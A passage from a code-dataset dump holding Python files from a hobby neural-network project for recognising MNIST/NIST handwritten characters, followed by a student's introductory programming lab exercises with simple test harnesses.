randomize);\n t3,l3 ,files = batch_load(\"normtest\", 1, 5000, randomize = randomize);\n print \"load numeric\"\n if alphabet_set and (not load_type == LOAD.NUMERIC) :\n \n stretch = int(nist_num / float(10)) \n \n if nist_num > large_size :\n stretch = int(large_size / float(10) )\n #print('middle')\n \n if nist_num > large_size and zz == m -1 : \n stretch = int (((nist_num ) - (zz * large_size ))/ float(10)) \n #print('end')\n \n if True : ##not img_pickle_sv : ## not nist_num == pickle_len and\n \n train_start = zz * large_size; # start with zero\n train_stop = train_start + (stretch * 8);\n valid_start = train_stop + 1;\n valid_stop = valid_start + (stretch * 1);\n test_start = valid_stop + 1;\n test_stop = test_start + (stretch * 1);\n\n \n if (not img_pickle_ld) and load_type != LOAD.NUMERIC :\n if not test_only :\n files = []\n t1, l1, files = batch_load_alpha( train_start, train_stop, randomize, files, load_type)\n t2, l2, files = batch_load_alpha( valid_start, valid_stop, randomize, files, load_type)\n \n else:\n t1 = l1 = t2 = l2 = files = []\n \n t3, l3 , files = batch_load_alpha( test_start, test_stop, randomize, files, load_type)\n \n \n elif img_pickle_ld :\n print('Loading pickle file: ~/workspace/nn/' + save_filename )\n print('delete this file to disable loading.')\n \n dset2 = dset[0][0]\n #print dset2[1]\n \n t1, l1 = dset2[0][train_start:train_stop] , dset2[1][train_start:train_stop]\n t2, l2 = dset2[0][valid_start:valid_stop] , dset2[1][valid_start:valid_stop]\n t3, l3 = dset2[0][test_start:test_stop] , dset2[1][test_start:test_stop]\n print('train: ' + str(len(l1)))\n print('valid: ' + str(len(l2)))\n print('test: ' + str(len(l3)))\n \n \n rval = [(t1, l1), (t2, l2), (t3, l3)]\n\n\n rval_array.append( rval )\n \n elif (not test_only) and img_pickle_sv :\n num_start = 0\n num_stop = nist_num\n t1, l1 , files = batch_load_alpha( num_start, num_stop, randomize=False, files = [], load_type=load_type)\n print('train: ' + str(len(l1)))\n \n #plocal.save_pickle_img( rval_array ,[],[], filename = save_filename );\n plocal.save_pickle_img( [[[t1, l1]]] ,[],[], filename = save_filename );\n print('\\nImage Pickle Save: only works for small image sets!')\n print('(it hogs memory and will freeze your computer.)')\n return rval_array , epochs, nist_stretch, load_type\n\n\t\ndef batch_load(basename = \"normpic\",\n series_start = 1, \n series_stop = 1, \n foldername = \"../oldpng-mnist/\",\n files = [],\n randomize = False):\n \n train_set = []\n train_num = []\n\n\n mnist = mnistl.MNIST(foldername)\n if basename == \"normpic\" :\n train_set, train_num = mnist.load_training()\n if basename == \"normtest\" :\n train_set, train_num = mnist.load_conv_test()\n if basename == \"normvalid\" :\n train_set, train_num = mnist.load_conv_valid()\n\n print \"len of mnist sets \" + str(len(train_num))\n if randomize :\n out_img = []\n out_num = []\n\n for ii in range(series_stop - series_start ) :\n\n k = random.randint(0, len(train_num) - 1)\n\n if True :\n for i in range(0, 28*28) :\n if train_set[k][i] > 100 :\n train_set[k][i] = 1\n else :\n train_set[k][i] = 0\n\n out_img.append(train_set[k])\n out_num.append(train_num[k])\n\n del train_set[k]\n del train_num[k]\n\n new_list = []\n if False :\n for jj in out_img:\n if isinstance(jj, list) :\n new_list.append(jj)\n print(\"----\")\n print(out_img)\n print(len(out_img))\n\n return out_img, out_num, files\n\n\n return train_set, train_num, files\n\t\ndef filename_list(series_start=0, series_stop=2, randomize = False , files = [] , load_type = 0):\n \n if len(files) == 0 :\n files = []\n folder = 'F*'\n #folder_username = getpass.getuser()\n home = expanduser(\"~\")\n \n #print(folder)\n g = glob(join(home ,'workspace','sd_nineteen','HSF_0',folder))\n h = glob(join(home ,'workspace','sd_nineteen','HSF_1',folder))\n g.extend(h)\n i = glob(join(home ,'workspace','sd_nineteen','HSF_2',folder))\n g.extend(i)\n jj = glob(join(home ,'workspace','sd_nineteen','HSF_3',folder))\n g.extend(jj)\n kk = glob(join(home ,'workspace','sd_nineteen','HSF_4',folder))\n g.extend(kk)\n ll = glob(join(home ,'workspace','sd_nineteen','HSF_6',folder))\n g.extend(ll)\n mm = glob(join(home ,'workspace','sd_nineteen','HSF_7',folder))\n g.extend(mm)\n g.sort()\n \n #print (\"sorted folder list: \", len(g))\n for j in g : #range(series_start, series_stop):\n gg = glob(join( j ,'*.bmp'))\n #print (\"list: \",gg)\n files.extend(gg)\n print ('loadable files: '+ str(len(files)))\n print ('loaded files : ' + str(int(series_stop - series_start)))\n files.sort()\n output = []\n if not randomize :\n output = files[int(series_start): int(series_stop) ]\n else :\n print len(files)\n num_files = int( series_stop - series_start )\n for j in range(num_files) :\n digit_start = 48\n k = random.randint(0, len(files))\n xxx, d = get_number(files[k], load_type)\n\n while d >= digit_start and d < digit_start + 10 and load_type == LOAD.ALPHA :\n #print d - digit_start\n del files[k]\n k = random.randint(0, len(files))\n xxx, d = get_number(files[k], load_type)\n\n xxx, d = get_number(files[k], load_type)\n if d >= digit_start and d < digit_start + 10 and load_type == LOAD.ALPHA:\n print \"file error number detected\"\n exit()\n #if j is 0 : print files[k]\n output.append(files[k])\n del files[k]\n \n return output, files\n \n\t\ndef batch_load_alpha(series_start = 1, series_stop = 1, randomize = False, files = [], load_type =0):\n img_list , files = filename_list(series_start, series_stop, randomize, files, load_type )\n train_set = []\n train_num = []\n oneimg = []\n oneindex = 0\n i = 0\n if (len(img_list) > 0) and True:\n print('sample: ' + img_list[0])\n sys.stdout.flush()\n \n for filename in img_list:\n\n oneimg, oneindex = look_at_img(filename, load_type=load_type)\n train_set.append(oneimg)\n train_num.append(oneindex)\n #print(filename)\n return train_set, train_num, files\n\ndef look_at_img( filename , i = 0, load_type =0):\n img = Image.open(open( filename ))\n size = 28, 28\n img2 = numpy.zeros(shape=(size), dtype='float64')\n oneimg = []\n oneindex = i\n xy_list = []\n \n img = numpy.asarray(img, dtype='float64')\n marker = 0\n ''' Detect 0 for black -- put in list in shrunk form. '''\n for x in range(0,len(img)):\n for y in range(0, len(img)):\n if (float(img[x,y,0]) < 255) is True:\n xy_list.append([x* 1/float(2) - 18,y * 1/float(2) - 18])\n \n ''' Put list in 28 x 28 array. '''\n if len(xy_list) == 0 :\n xy_list = [0,0]\n for q in xy_list :\n if (q[0] < 28) and (q[1] < 28) and (q[0] >= 0) and (q[1] >= 0):\n #print (q[0], q[1])\n img2[int(math.floor(q[0])), int(math.floor(q[1]))] = 1\n \n ''' Then add entire array to oneimg variable and flatten.'''\n for x in range(28) :\n for y in range(28) :\n oneimg.append(img2[x,y])\n \n ''' Get the image ascii number from the filename. '''\n oneindex , unused = get_number(filename, load_type)\n return oneimg, oneindex\n\ndef get_number(filename, load_type ):\n mat = ascii_matrix(load_type)\n newindex = 0\n index = 0\n l_bmp = len('.bmp') ## discard this many chars for ending\n l_sample = l_bmp + 2 ## sample two chars\n \n l_filename = len(filename)\n filename = filename[l_filename - l_sample : l_filename - l_bmp] ## slice\n if filename[0:1] is '_':\n filename = filename[1: len(filename)] ## slice again\n ## consume first char.\n filename = '0x' + filename\n index = int(filename, 16) ## translate hex to int\n for i in range(len(mat)) :\n if index is mat[i][0] :\n newindex = i\n return newindex, index\n\ndef ascii_matrix(alphabet_set ) :\n mat = []\n a_upper = 65 ## ascii for 'A'\n a_lower = 97 ## ascii for 'a'\n z_digit = 48 ## ascii for '0'\n \n if alphabet_set == LOAD.ALPHANUMERIC or alphabet_set == LOAD.ALPHA :\n for i in range(0,26):\n value = int(a_upper + i) , str(unichr(a_upper+i))\n mat.append(value)\n for i in range(0,26):\n value = int(a_lower + i) , str(unichr(a_lower+i))\n mat.append(value)\n\n if alphabet_set == LOAD.ALPHANUMERIC or alphabet_set == LOAD.NUMERIC : ## do not seperate nums and alphabet yet.\n for i in range(0,10):\n value = int(z_digit + i) , str(unichr(z_digit+i))\n mat.append(value)\n if len(mat) == 0 :\n print (\"load type \" + str(alphabet_set)), LOAD.ALPHA , LOAD.NUMERIC, LOAD.ALPHANUMERIC\n raise RuntimeError\n #print(len(mat))\n return mat\n\n\ndef shared_dataset(data_xy, borrow=True):\n data_x, data_y = data_xy\n shared_x = theano.shared(numpy.asarray(data_x,\n dtype=theano.config.floatX),\n borrow=borrow)\n shared_y = theano.shared(numpy.asarray(data_y,\n dtype=theano.config.floatX), \n borrow=borrow)\n return shared_x, T.cast(shared_y, 'int32')\n\ndef show_xvalues(xarray = [[]], index = 0):\n print (\"show x values \" + str(index))\n xx = xarray[index]\n ln = int(math.floor(math.sqrt(len(xx)))) \n #print (ln)\n for x in range(1,ln):\n for y in range(1, ln):\n zzz = '#'\n #zzz =int( xx[x* ln + y])\n if int(xx[ x* ln + y]) == int( 0) : \n zzz = '.'\n #print(zzz) \n sys.stdout.write(zzz)\n print(\"\");\n print (\"\\n===========================\\n\")\n\ndef parse_filename(filename=\"\"):\n nist_stretch = 2\n large_size = 1\n epochs = 10\n split_filename = filename.split(\"/\")\n save_filename = split_filename[len(split_filename) - 1]\n tag1 = \"save\"\n tag2 = \"x5K-images\"\n tag3 = \"GB-limit\"\n tag4 = \"epochs.save\"\n tag5 = \"run\" ## IMPLIED ALPHA-NUMERIC!!\n tag6 = \"alpha\"\n tag7 = \"numeric\"\n s = save_filename.split(\"_\")\n #print(s)\n load = False\n\n load_type = 0\n g = s[0].split(\"-\")\n s[0] = g[0]\n if len(g) == 1 :\n load_type = LOAD.ALPHANUMERIC\n print(\"load both\")\n elif g[1] == tag6 :\n load_type = LOAD.ALPHA\n print(\"load alpha\")\n elif g[1] == tag7 :\n load_type = LOAD.NUMERIC\n print(\"load numeric\")\n\n if ( s[0] == tag1 and s[2] == tag2 and s[4] == tag3 and s[6] == tag4) :\n nist_stretch = int(s[1].strip())\n large_size = int(float(s[3].strip()) * float(math.pow(2,30)) ) #1000000000\n epochs = int(s[5].strip())\n load = True\n elif (s[0] == tag5 and s[2] == tag2 and s[4] == tag3 and s[6] == tag4) :\n nist_stretch = int(s[1].strip())\n large_size = int(float(s[3].strip()) * float(math.pow(2,30)) ) #1000000000\n epochs = int(s[5].strip())\n else :\n print(\"Poorly formed file name!\")\n exit();\n return nist_stretch, large_size, epochs, save_filename, load , load_type;\n \n\n"
},
{
"alpha_fraction": 0.4588913917541504,
"alphanum_fraction": 0.46651676297187805,
"avg_line_length": 40.75101852416992,
"blob_id": "cf5e97b409bf8e03a3b5128fd5fc2d486a17934a",
"content_id": "50d277cc499699004c3060309f9ab5410cc9c384",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10229,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 245,
"path": "/nnet/neuralnetwork.py",
"repo_name": "radiodee1/awesome-nnet",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport scipy as sp\nimport cPickle, os\nfrom .layers import ParamMixin\nfrom .helpers import one_hot, unhot\nimport enum_local as LOAD\nimport datetime\nimport store\n\nclass NeuralNetwork:\n def __init__(self, layers, rng=None):\n self.layers = layers\n if rng is None:\n rng = np.random.RandomState()\n self.rng = rng\n self.name = \"mnist\"\n self.interrupt = False\n self.android_load = False\n self.nn_dir = \"../nn-best/\"\n\n def _setup(self, X, Y):\n # Setup layers sequentially\n next_shape = X.shape\n for layer in self.layers:\n layer._setup(next_shape, self.rng)\n next_shape = layer.output_shape(next_shape)\n# print(next_shape)\n if next_shape != Y.shape:\n raise ValueError('Output shape %s does not match Y %s'\n % (next_shape, Y.shape))\n\n def fit(self, X, Y, learning_rate=0.1, max_iter=10, batch_size=64, name=\"mnist\", load_type = LOAD.NUMERIC):\n \"\"\" Train network on the given data. \"\"\"\n self.name = name\n \n stamp = str(\" -- start stamp -- \") \n self.append_status(name=name, message=stamp)\n \n n_samples = Y.shape[0]\n n_batches = n_samples // batch_size\n Y_one_hot = one_hot(Y , load_type=load_type)\n self._setup(X, Y_one_hot)\n self.load_file(name=name)\n iter = 0\n # Stochastic gradient descent with mini-batches\n while iter < max_iter:\n iter += 1\n for b in range(n_batches):\n \n message = (str(b + 1) + \" of \" + str(n_batches) +\" batches (batch size=\"+str(batch_size)+\"), iter \" \n + str(iter) + \" with total of \"+ str(max_iter))\n self.append_status(name=name, message=message)\n batch_begin = b*batch_size\n batch_end = batch_begin+batch_size\n X_batch = X[batch_begin:batch_end]\n Y_batch = Y_one_hot[batch_begin:batch_end]\n\n # Forward propagation\n X_next = X_batch\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = X_next\n\n # Back propagation of partial derivatives\n next_grad = self.layers[-1].input_grad(Y_batch, Y_pred)\n for layer in reversed(self.layers[:-1]):\n next_grad = layer.bprop(next_grad)\n\n # Update parameters\n for layer in self.layers:\n if isinstance(layer, ParamMixin):\n for param, inc in zip(layer.params(),\n layer.param_incs()):\n param -= learning_rate*inc\n \n modconst = 5\n modnum = (b+1) % modconst\n #print modnum\n if b+1 > 1 and modnum == 0 :\n if self.interrupt:\n message = (\"Interrupt for training status...\")\n self.append_status(name=self.name, message = message)\n self.status(iter,X,Y,Y_one_hot)\n else :\n message = (\"periodic save...\")\n self.append_status(name=self.name, message = message)\n self.save_file(name=self.name)\n \n self.status(iter,X,Y,Y_one_hot) ##end\n \n def status(self, iter,X,Y,Y_one_hot):\n # Output training status\n print(\"\\nfind loss and error \" + str(len(X)))\n loss = self._loss(X, Y_one_hot)\n error = self.error(X, Y)\n message = str('iter %i, loss %.4f, train error %.4f - %i imgs' % (iter, loss, error, len(X)))\n self.append_status(name=self.name, message = message)\n if iter > 0 : self.save_file(name=self.name)\n\n def _loss(self, X, Y_one_hot):\n X_next = X\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = X_next\n return self.layers[-1].loss(Y_one_hot, Y_pred)\n\n def predict(self, X):\n \"\"\" Calculate an output Y for the given input X. \"\"\"\n X_next = X\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = unhot(X_next)\n return Y_pred\n\n def error(self, X, Y):\n \"\"\" Calculate error on the given data. \"\"\"\n Y_pred = self.predict(X)\n error = Y_pred != Y\n return np.mean(error)\n\n def set_interrupt(self,interrupt):\n self.interrupt = interrupt\n \n def set_name(self,name):\n self.name = name\n \n def set_android_load(self,val) :\n self.android_load = val\n\n def check_gradients(self, X, Y):\n \"\"\" Helper function to test the parameter gradients for\n correctness. \"\"\"\n # Warning: the following is a hack\n print \"check gradients...\"\n Y_one_hot = one_hot(Y) ## this line needs a load_type!!\n self._setup(X, Y_one_hot)\n for l, layer in enumerate(self.layers):\n if isinstance(layer, ParamMixin):\n print('layer %d' % l)\n for p, param in enumerate(layer.params()):\n param_shape = param.shape\n\n def fun(param_new):\n param[:] = np.reshape(param_new, param_shape)\n return self._loss(X, Y_one_hot)\n\n def grad_fun(param_new):\n param[:] = np.reshape(param_new, param_shape)\n # Forward propagation\n X_next = X\n for layer in self.layers:\n X_next = layer.fprop(X_next)\n Y_pred = X_next\n\n # Back-propagation of partial derivatives\n next_grad = self.layers[-1].input_grad(Y_one_hot,\n Y_pred)\n for layer in reversed(self.layers[l:-1]):\n next_grad = layer.bprop(next_grad)\n return np.ravel(self.layers[l].param_grads()[p])\n\n param_init = np.ravel(np.copy(param))\n err = sp.optimize.check_grad(fun, grad_fun, param_init)\n print('diff %.2e' % err)\n \n def save_file(self, name = \"mnist\"):\n print (\"saving \" + name)\n W = []\n b = []\n level = 0\n for layer in self.layers:\n level += 1\n if isinstance(layer, ParamMixin):\n W, b = layer.params()\n \n if not self.android_load :\n shapew1 = str(self.nn_dir+name+'_shape_w'+str(level)+'.txt')\n np.savetxt(shapew1, W.shape)\n shapeb1 = str(self.nn_dir+name+'_shape_b'+str(level)+'.txt')\n np.savetxt(shapeb1, b.shape)\n textw1 = str(self.nn_dir+name+'_w'+str(level)+'.txt')\n Wout, xshape = store.store_w(W)\n np.savetxt(textw1, Wout)\n textb1 = str(self.nn_dir+name+'_b'+str(level)+'.txt')\n bout , xshape = store.store_b(b)\n np.savetxt(textb1, bout)\n print (str (level) + \" save.\")\n if False:\n # pickle W and b\n f1 = file(str(self.nn_dir+name+'-weights'+ str(level) +'.save'), 'wb')\n cPickle.dump(W, f1, protocol=cPickle.HIGHEST_PROTOCOL)\n f1.close()\n f2 = file(str(self.nn_dir+name+'-bias'+ str(level) +'.save'), 'wb')\n cPickle.dump(b, f2, protocol=cPickle.HIGHEST_PROTOCOL)\n f2.close()\n \n \n \n def load_file(self, name = \"mnist\"):\n #print len(self.layers)\n for i in range(len(self.layers)):\n if isinstance(self.layers[i], ParamMixin):\n if False: ## convert old pickle files to new format...\n path1 = str(self.nn_dir+name+\"-weights\" + str(i+1) + \".save\")\n if os.path.exists(path1):\n f1 = file(path1, 'rb')\n loaded_obj1 = cPickle.load(f1)\n f1.close()\n self.layers[i].W = loaded_obj1\n print (\"load \" + path1)\n path2 = str(self.nn_dir+name+\"-bias\" + str(i+1) + \".save\")\n if os.path.exists(path2):\n f2 = file(path2, 'rb')\n loaded_obj2 = cPickle.load(f2)\n f2.close()\n self.layers[i].b = loaded_obj2\n print (\"load \" + path2)\n \n if not self.android_load :\n ## load text files...\n textw1 = str(self.nn_dir+name+'_w'+str(i+1)+'.txt')\n shapew1 = str(self.nn_dir+name+'_shape_w'+str(i+1)+'.txt')\n if os.path.exists(textw1) and os.path.exists(shapew1):\n wshape = np.loadtxt(shapew1)\n wtext = np.loadtxt(textw1)\n self.layers[i].W = store.unstore_w(wtext, wshape)\n print 'w' + str(i+1)\n textb1 = str(self.nn_dir+name+'_b'+str(i+1)+'.txt')\n shapeb1 = str(self.nn_dir+name+'_shape_b'+str(i+1)+'.txt')\n if os.path.exists(textb1) and os.path.exists(shapeb1) :\n bshape = np.loadtxt(shapeb1)\n btext = np.loadtxt(textb1)\n self.layers[i].b = store.unstore_b(btext, bshape)\n print 'b' + str(i+1)\n elif self.android_load :\n pass\n \n def append_status(self, name, message):\n print (message)\n time = \"[\" + str(datetime.datetime.now()) + \"]\"\n message = time + \" \" + message + \"\\n\"\n filename = \"status-\" + name.strip() +\".txt\"\n f = open(filename, 'a')\n f.write(message)\n f.close()\n"
},
{
"alpha_fraction": 0.4034048914909363,
"alphanum_fraction": 0.4293116331100464,
"avg_line_length": 22.701753616333008,
"blob_id": "ca4aed3d26122dd04de70c31d109d24184a1394f",
"content_id": "2715ad4d15547aa14a8e9d2feccfd9729a4375ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1351,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 57,
"path": "/nnet/store.py",
"repo_name": "radiodee1/awesome-nnet",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport numpy as np\n\ndef store_w(w):\n return np.reshape(w,(1,-1)), w.shape ##store(w)\n \n \ndef store_b(b):\n return np.reshape(b,(1,-1)), b.shape ##store(b)\n \n \ndef unstore_w(s, shape):\n w = np.reshape(s, shape)\n return w\n \n \ndef unstore_b(s, shape):\n b = np.reshape(s, shape)\n return b\n \n \n################## just test stuff here ##################\ndef store(x):\n shape = x.shape\n #print 'shape', shape\n #ln = len(shape)\n out = []\n \n for i in x:\n if isinstance(i, (list, np.ndarray, tuple)):\n for j in i:\n #print 'j', j\n if isinstance(j, (list, np.ndarray, tuple)) :\n for k in j:\n if isinstance(k, (list, np.ndarray, tuple)):\n for m in k:\n out.append(m)\n #print 'm',m\n else: out.append(k)\n else: out.append(j)\n else :out.append(i)\n \n return out, shape\n \n \nif __name__ == '__main__':\n shape = (4,3,2,2)\n x = np.zeros(shape=(4,3,2,2))\n z = np.array([[1,2,3],[4,5,6],[7,8,9],[10,11,12]])\n shape2 = z.shape\n print z, shape2\n z2 , s = store(z)\n \n print z2\n z2 = unstore_w(z2, shape2)\n print z2\n"
}
] | 3 |
slyflare/ECOR-1051-Lab
|
https://github.com/slyflare/ECOR-1051-Lab
|
920c580595015533ea8bd5169e4f5a0032c41aa3
|
f53f9c2d2243d342fc5e297bd036d46facf408fb
|
13399fa27450d58c8274e2138eb6372855c2fa75
|
refs/heads/main
| 2023-01-07T21:03:29.944920 | 2020-10-31T17:02:31 | 2020-10-31T17:02:31 | 308,930,752 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4387935996055603,
"alphanum_fraction": 0.5150798559188843,
"avg_line_length": 22.48611068725586,
"blob_id": "c8088ac2e954653eddfeb12cfb7e34b9f09ef3b4",
"content_id": "30cbc593cc7dbcd2232b281fbdec8086caf2ec81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1691,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 72,
"path": "/lab10.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1:\n\n\ndef bank_statement(L:list):\n \"\"\"Takes a list of floating point numbers and sorts them into positives and negatives. The positives act as the\n bank deposits whilst the negatives act as the withdrawals. The function then returns a new list contain total\n deposits, withdrawals, and balance.\n >>>bank_statement([2.3, 4.5, -4.12])\n [6.8, -4.12, 2.68]\n >>>bank_statement([8.12,-16.2,2.30])\n [10.42, -16.2, -5.78]\n \"\"\"\n deposits = 0\n withdrawal = 0\n for i in L:\n if i >= 0:\n deposits += i\n elif i < 0:\n withdrawal += i\n return [round(deposits,2), round(withdrawal,2), round(deposits+withdrawal,2)]\n\n\ntest = bank_statement([5.3, 6.975748, -2.234, -3.23409452312])\nprint(test)\n\nprint('----------------------------------------------------------------------------')\n\n# exercise 2:\n\n\ndef divisors(num: int):\n \"\"\"Takes a number and returns a list containing all of its divisors\n >>>divisors(5)\n [1,5]\n >>>divisors(6)\n [1,2,3,6]\n >>>divisors(8)\n [1,2,4,8]\n \"\"\"\n divs = []\n for i in range(1, num):\n if num % i == 0:\n divs.insert(i-1, i)\n divs.insert(len(divs), num)\n return divs\n\n\ntest = divisors(8)\nprint(test)\n\nprint('----------------------------------------------------------------------------')\n\n# exercise 3:\n\n\ndef reverse(L:list):\n \"\"\"Takes a list and reverses the order of the elements\n >>>reverse([1,2,3,4,5])\n [5,4,3,2,1]\n >>>reverse([12,15,14,13,11])\n [11,13,14,15,12]\n \"\"\"\n counter = 0\n N = []\n for i in L:\n N.insert(-1-counter, i)\n counter += 1\n return N\n\n\ntest = reverse([1,2,3,4,5,6,7,8,9,0])\nprint(test)\n"
},
{
"alpha_fraction": 0.49822160601615906,
"alphanum_fraction": 0.5663474798202515,
"avg_line_length": 19.655366897583008,
"blob_id": "6ef3ad8374f2ce569075bd57b7240f9f90bb46d9",
"content_id": "7e87a616718cf80758e2fec137409036c04b677f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3655,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 177,
"path": "/lab6.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# excersise 1\ndef factorial(n: int) -> int:\n \"\"\"Return n! for\n >>> factorial(1)\n 1\n >>> factorial(2)\n 2\n >>> factorial(3)\n 6\n >>> factorial(4)\n 24\n positive values of n.\n \"\"\"\n fact: int = 1\n for i in range(2, n+1):\n fact = fact * n\n return fact\n\ndef test_int(actual:int,expected:int):\n print('Running automated testing...')\n print('Expected result:',expected, ', Actual result:',actual)\n if actual == expected:\n print('successful')\n test_int.counter += 1\n else:\n print('failed')\n print('total successful tests:', test_int.counter)\n\ntest_int.counter = 0\n\ntest = test_int(factorial(1),1)\ntest = test_int(factorial(2),2)\ntest = test_int(factorial(3),6)\ntest = test_int(factorial(4),24)\n\nprint('-----------------------------------------------------')\n# excersise 2\ndef tip(cost, satisfaction):\n \"\"\"Return estimated tips depending on customer satisfaction, 20% for full satisfaction, 15% for moderate satisfaction\n 5% for dissatisfied\n >>>tip(15,3)\n 3.0\n >>>tip(20,2)\n 3.0\n >>>tip(25,1)\n 1.25\n \"\"\"\n if satisfaction == 3:\n return cost*0.2\n if satisfaction == 2:\n return cost*0.15\n elif satisfaction == 1:\n return cost*0.05\n\n\nx = 0\ny = 0\n\ntest = tip(15,3)\nprint('testing tip(15,3)')\nprint('Expected result: 3.0, Actual result:', test)\n\nif test == 3.0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = tip(20,2)\n\nprint('testing tip(20,2)')\nprint('Expected result: 3.0, Actual result:', test)\nif test == 3.0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = tip (25,1)\nprint('testing tip(25.1)')\nprint('Expected result:1.5, Actual result:', test)\n\nif test == 1.25:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\nprint('Successful excersise 2 tests:', x)\nprint('Failed excersise 2 tests:', y)\n\nprint('-----------------------------------------------------')\n# excersise 3\ndef coupon(spent):\n \"\"\"Returns the value of the coupon based on the amount spent in groceries. If spent < 10 then there is no coupon,\n if 10 < spent <= 60 its 8%, if 60 < spent <= 150 its 10%, if 150 < spent <= 210 its 12%, if spent > 210 its 14%\n >>>coupon(5)\n 0\n >>>coupon(100)\n 10.0\n >>>coupon(150)\n 15.0\n >>>coupon(200)\n 24.0\n >>>coupon(250)\n 35.0\n \"\"\"\n if spent < 10:\n return 0\n if spent <= 60:\n return spent*0.08\n if 60 < spent <= 150:\n return spent*0.10\n if 150 < spent <= 210:\n return spent*0.12\n if spent > 210:\n return spent*0.14\n\n\nx = 0\ny = 0\n\ntest = coupon(5)\nprint('testing coupon(5)')\nprint('Expected result: 0, Actual result:', test)\nif test == 0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(100)\nprint('testing coupon(100)')\nprint('Expected result: 10.0, Actual result', test)\nif test == 10.0:\n print('successful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(150)\nprint(\"testing coupon(150)\")\nprint('Expected result: 15.0, Actual result:', test)\nif test == 15.0:\n print('succesful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(200)\nprint(\"testing coupon(200)\")\nprint('Expected result: 24.0, Actual result:', test)\nif test == 24.0:\n print('succesful')\n x += 1\nelse:\n print('failed')\n y += 1\n\ntest = coupon(250)\nprint(\"testing coupon(250)\")\nprint('Expected result: 35.0, Actual result:', test)\nif test == 35.0:\n print('succesful')\n x += 1\nelse:\n print('failed')\n y += 1\n\nprint('Successful excersise 3 tests:', x)\nprint('Failed excersise 3 tests:', y)"
},
{
"alpha_fraction": 0.41182321310043335,
"alphanum_fraction": 0.4996447265148163,
"avg_line_length": 20.195783615112305,
"blob_id": "71683d78a5ff2ac9c47de6c69b24602a0b130f96",
"content_id": "bfac091c46ad016945f789274664ae1bf909d2a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7037,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 332,
"path": "/lab8.py",
"repo_name": "slyflare/ECOR-1051-Lab",
"src_encoding": "UTF-8",
"text": "# exercise 1:\n\n\ndef first_last6(nums:list):\n \"\"\"Returns true or false depending on whether the first and/or last number is 6\n >>>first_last6([1,2,3,4,5,6])\n True\n >>>first_last6([6,5,4,3,2,1])\n True\n >>>first_last6([5,6,6,6,6,5])\n False\n >>>first_last6([1,2,3,4,5,3,3,2,1])\n False\n \"\"\"\n a = len(nums)\n if nums[0] == 6 or nums[a-1] == 6:\n return True\n else:\n return False\n\n\ntest = first_last6([6, 1, 1, 1, 1])\nprint(test)\ntest = first_last6([11, 1, 1, 2, 3, 6])\nprint(test)\ntest = first_last6([1, 6, 6, 6, 6, 6, 1])\nprint(test)\n\n\nprint('-------------------------------------------------')\n# exercise 2:\n\n\ndef same_first_last(L:list):\n \"\"\"Returns True if the list is not empty and the first and last number are equal.\n >>>same_first_last([])\n False\n >>>same_first_last([1,2,3,4])\n False\n >>>same_first_last([1,2,3,1])\n True\n \"\"\"\n if L == []:\n return False\n if L[0] == L[len(L)-1]:\n return True\n else:\n return False\n\n\ntest = same_first_last([1, 2, 3, 1])\nprint(test)\ntest = same_first_last([])\nprint(test)\ntest = same_first_last([2, 3, 4, 1, 4])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 3:\n\n\ndef make_pi(pi:list):\n \"\"\" Returns true if a list of 3 has the elements containing 3,1,4\n >>>make_pi(3,1,4)\n True\n >>>make_pi(4,1,3)\n False\n \"\"\"\n if len(pi) == 3:\n if pi[0] == 3 and pi[1] == 1 and pi[2] == 4:\n return True\n else:\n return False\n else:\n return False\n return [3,1,4]\n\n\ntest = make_pi([3,1,4,6])\nprint(test)\ntest = make_pi([3,1,4])\nprint(test)\ntest = make_pi([1,2,3,4])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 4:\n\n\ndef common_end(list1:list,list2:list):\n \"\"\"Returns True if the lists contain the same last element and/or same first element\n >>>common_end([1,2,3],[3,2,1])\n True\n >>>common_end([2,3,4,5,6])\n False\n >>>common_end([1,2,3,4,5,6],[1,0,9,8,7])\n True\n \"\"\"\n if list1[len(list1)-1] == list2[len(list2)-1]:\n return True\n if list1[len(list1)-1] == list2[0]:\n return True\n if list1[0] == list2[len(list2)-1]:\n return True\n if list1[0] == list2[0]:\n return True\n else:\n return False\n\n\ntest = common_end([1,2,3,1,2,3],[2,2,2,2,2,3])\nprint(test)\ntest = common_end([1,2,3,4,5,6],[1,0,9,8,7])\nprint(test)\ntest = common_end([1,3,4,5,6,7,8],[8,7,6,5,4,3,2,1])\nprint(test)\ntest = common_end([3,2,1],[7,1,4])\nprint(test)\n\nprint('-------------------------------------------------')\n# exercise 5:\n\n\ndef sum3(list:list):\n \"\"\"Returns the sum for the elements of a list containing 3 integers.\n >>>sum3([1,2,3])\n 6\n >>>sum3([12,13,15])\n 40\n >>>sum3([1,1,1])\n 3\n \"\"\"\n return list[0]+list[1]+list[2]\n\n\ntest = sum3([4,5,6])\nprint(test)\ntest = 